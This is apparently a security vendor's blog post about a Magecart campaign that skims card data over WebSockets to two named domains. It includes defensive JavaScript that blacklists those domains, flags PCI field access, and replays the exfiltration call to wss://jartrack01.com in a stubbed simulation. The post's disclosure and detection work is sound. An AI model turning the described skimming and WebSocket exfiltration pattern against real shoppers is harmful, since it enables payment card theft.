NEW MAGECART ATTACK: SILENT SKIMMING AND WEBSOCKETS

July 8, 2025

A newly discovered Magecart campaign is raising the bar on stealth—executing a silent skimming attack that evades conventional detection mechanisms by abusing first-party code and WebSocket channels.

Attack details

A trusted first-party script establishes a WebSocket connection to clicktrack01[.]com, which delivers the Magecart JavaScript payload. As users enter payment details into legitimate site forms, the script silently harvests the data and exfiltrates it through a second WebSocket—this time to jartrack01[.]com.

Unlike more visible tactics that inject fake forms, this attack does not alter the user interface in any way. Users remain completely unaware, as their data is skimmed directly from real input fields and transmitted covertly.

Critical Observations

  • First-party origin: The attack is launched from code embedded directly on the victim site—not a third-party integration—making it much harder to detect or block using CSP or third-party controls.
  • WebSocket exfiltration: Both delivery and data theft occur over WebSockets, which are rarely monitored by most security tools.
  • Previously unknown infrastructure: At the time of discovery, both clicktrack01[.]com and jartrack01[.]com had no history of malicious activity. Their inclusion in threat intelligence databases stems solely from this disclosure.

Magecart Patterns

This technique aligns with a broader trend in Magecart attacks:

  • Silent skimming, where malicious code monitors real forms rather than spoofing them, is increasingly common.
  • Trusted sources and first-party scripts are being compromised more often—making detection harder and breaches more damaging.
  • WebSockets are becoming the channel of choice for exfiltration, due to their stealth and flexibility.

How does Source Defense address such an attack?

Source Defense identified and analyzed this attack before any threat intelligence vendor had blacklisted the domains involved.

Thanks to this ongoing research and vigilance, these domains were promptly blacklisted in the product, and the following triggers raise an alert when such an attack occurs:

  • Outbound data is sent to blacklisted malicious domains.
  • In the same session, PCI data is being accessed.
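The flow described under "Attack details" (a first-party script opening a WebSocket to the payload host, card data typed into the real form, a second WebSocket carrying it out) and the two alert triggers above can be modelled as a small client-side monitor. The code below is an added example, not Source Defense's product or code: it wraps the page's WebSocket constructor to log every connection and send, records when a cardholder-data field is read, and evaluates a session against the triggers. The two blacklisted domains are the ones named in this post; the allowlist, the PCI field names, the trigger names and the stub WebSocket used for the offline replay are all constructed for the demo. It also goes one step beyond the post's blacklist-based triggers by flagging any never-seen WebSocket host opened after card data was touched, which is the gap the conclusions warn about for sites relying solely on external blacklists.

```javascript
// Added example (not Source Defense code). Policy values are constructed for
// the demo except the two domains, which are the ones named in the post.
const POLICY = {
  blacklist: new Set(["clicktrack01.com", "jartrack01.com"]), // from the post
  allowlist: new Set(["shop.example", "api.shop.example"]),   // constructed
  pciFields: new Set(["cardnumber", "cc-number", "cvv", "cvc", "expiry"]), // constructed
};

// Hostname of a ws:// or wss:// URL, or null if it is not a WebSocket URL.
function wsHost(url) {
  try {
    const u = new URL(url);
    return u.protocol === "ws:" || u.protocol === "wss:" ? u.hostname.toLowerCase() : null;
  } catch (e) {
    return null;
  }
}

// Verdict for one endpoint: "blacklisted", "allowed", "unknown" or "invalid".
function classifyEndpoint(url, policy = POLICY) {
  const host = wsHost(url);
  if (host === null) return "invalid";
  if (policy.blacklist.has(host)) return "blacklisted";
  if (policy.allowlist.has(host)) return "allowed";
  return "unknown";
}

// One browsing session's observations, in the order they happened.
function newSession() {
  return { events: [] };
}

// Call from an 'input' listener; records that a cardholder-data field was read.
function recordFieldAccess(session, fieldName, policy = POLICY) {
  if (policy.pciFields.has(String(fieldName).toLowerCase())) {
    session.events.push({ type: "pci_access", field: fieldName });
  }
}

// Replace globalObj.WebSocket with a subclass that logs opens and sends.
// Pass `window` in a browser; the replay below passes an object with a stub.
function installWebSocketMonitor(globalObj, session) {
  const Orig = globalObj.WebSocket;
  class MonitoredWebSocket extends Orig {
    constructor(url, protocols) {
      super(url, protocols);
      session.events.push({ type: "ws_open", url: String(url) });
    }
    send(data) {
      const size = typeof data === "string" ? data.length : (data && data.byteLength) || 0;
      session.events.push({ type: "ws_send", url: String(this.url), size });
      return super.send(data);
    }
  }
  globalObj.WebSocket = MonitoredWebSocket;
}

// Apply the triggers. Alerts are returned rather than printed so they can be tested.
function evaluate(session, policy = POLICY) {
  const alerts = [];
  const pciInSession = session.events.some((e) => e.type === "pci_access");
  let pciSeenSoFar = false;
  for (const ev of session.events) {
    if (ev.type === "pci_access") { pciSeenSoFar = true; continue; }
    const host = wsHost(ev.url);
    const verdict = classifyEndpoint(ev.url, policy);
    if (verdict === "blacklisted") {
      if (ev.type === "ws_open") {
        alerts.push({ trigger: "ws_to_blacklisted", host, severity: "high" });
      } else {
        // Trigger 1: outbound data to a blacklisted domain. Trigger 2 (PCI data
        // accessed in the same session) raises it to critical.
        alerts.push({
          trigger: pciInSession ? "pci_data_to_blacklisted" : "data_to_blacklisted",
          host, severity: pciInSession ? "critical" : "high", size: ev.size,
        });
      }
    } else if (verdict === "unknown" && ev.type === "ws_open" && pciSeenSoFar) {
      // Beyond the blacklist: a WebSocket host nobody vetted, opened after card data was read.
      alerts.push({ trigger: "unknown_ws_after_pci", host, severity: "medium" });
    }
  }
  return alerts;
}

// Stub standing in for the browser's WebSocket so the replay runs offline (constructed).
class StubWebSocket {
  constructor(url) { this.url = url; this.sent = []; }
  send(data) { this.sent.push(data); }
}

// Replay the sequence the post describes and return the resulting alerts.
function simulateDescribedAttack() {
  const session = newSession();
  const fakeWindow = { WebSocket: StubWebSocket };
  installWebSocketMonitor(fakeWindow, session);
  new fakeWindow.WebSocket("wss://clicktrack01.com/socket"); // 1. payload delivery channel
  recordFieldAccess(session, "cardNumber");                  // 2. shopper fills the real form
  recordFieldAccess(session, "cvv");
  recordFieldAccess(session, "email");                       //    not a PCI field, ignored
  const exfil = new fakeWindow.WebSocket("wss://jartrack01.com/collect"); // 3. exfil channel
  exfil.send(JSON.stringify({ constructed: "sample record" }));
  return evaluate(session);
}

console.log(JSON.stringify(simulateDescribedAttack(), null, 2));
```

In a browser the monitor has to be installed before any other script runs (`installWebSocketMonitor(window, session)` at the top of the first inline script), with `document.addEventListener("input", (e) => recordFieldAccess(session, e.target.name))` feeding the PCI side. The wrapper only sees connections made through the page's `WebSocket` constructor; a CSP `connect-src` directive, which governs WebSocket endpoints as well as fetch/XHR, is the complementary control that blocks the connection outright regardless of which script opened it.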

Conclusions

This attack reinforces the need to monitor all script behavior, not just third-party integrations, and to track unusual data flows, especially over channels like WebSockets.

Organizations relying solely on CSP or external blacklists are at risk of silent data theft—even on PCI-compliant sites.

PCI DSS 4.0 makes client-side security a priority.

Source Defense delivers a solution for PCI DSS requirements 6.4.3 and 11.6.1 without adding a burden to your security teams.
